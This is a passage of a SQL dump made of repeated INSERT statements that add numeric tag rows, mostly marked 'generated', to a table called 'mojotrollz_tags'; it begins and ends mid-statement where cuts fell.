`type`, `value`, `comment`) VALUES (158599, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158608, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158674, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158678, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158679, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158680, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160409, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160410, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160411, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160413, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160414, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160415, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160416, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160418, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160419, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160420, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160421, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160426, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160436, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160437, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160438, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160439, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160440, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160441, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160442, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160443, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160444, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160445, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160468, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160469, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160470, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160836, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160840, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160845, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160866, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160867, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160868, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160869, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160870, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160871, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161460, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161461, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161462, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161495, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161504, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161505, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161516, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161521, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161522, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161523, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161524, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161525, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161526, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161527, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161536, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161557, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161752, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (162024, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (163313, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (163645, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164618, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164644, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164651, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164658, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164659, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164660, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164661, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164662, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164688, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164689, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164704, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164725, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164726, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164729, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164778, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164779, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164780, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164781, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164798, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164819, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164825, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164838, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164840, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164867, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164868, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164869, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164870, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164881, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164882, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164883, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164884, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164885, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164886, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164887, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164888, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164890, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164891, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164908, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164909, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164910, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164911, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164953, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164954, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164955, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164956, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164957, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164958, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165549, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165557, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165558, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165618, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165619, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165620, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165621, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165622, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165622, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165623, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165623, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165624, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165624, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165625, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165625, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165626, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165626, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165627, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165627, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165628, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165628, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165629, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165629, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165630, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165630, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165631, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165631, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165632, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165632, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165633, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165633, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165637, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165658, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165738, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165739, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165740, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165741, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165742, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165743, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165744, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165745, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165746, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165747, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165748, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165749, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165750, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (166863, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (166872, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167284, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167285, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167286, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167287, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167288, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167289, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167290, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167291, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169216, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169217, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169243, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169264, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169265, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169266, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169267, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169268, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169269, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169270, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169271, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169272, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169273, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169274, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169275, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169276, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169277, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169278, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169279, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169280, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169281, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169282, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169283, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169284, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169285, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169287, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169288, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169289, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169290, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169291, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169292, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169293, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169294, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169966, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169968, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169969, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169996, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169997, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169998, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (169999, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170000, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170001, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170002, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170039, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170040, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170041, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170056, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170057, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170058, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170059, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170060, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170061, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170062, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170063, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170064, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170065, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170347, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170348, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170349, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170350, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170351, 2, 1, 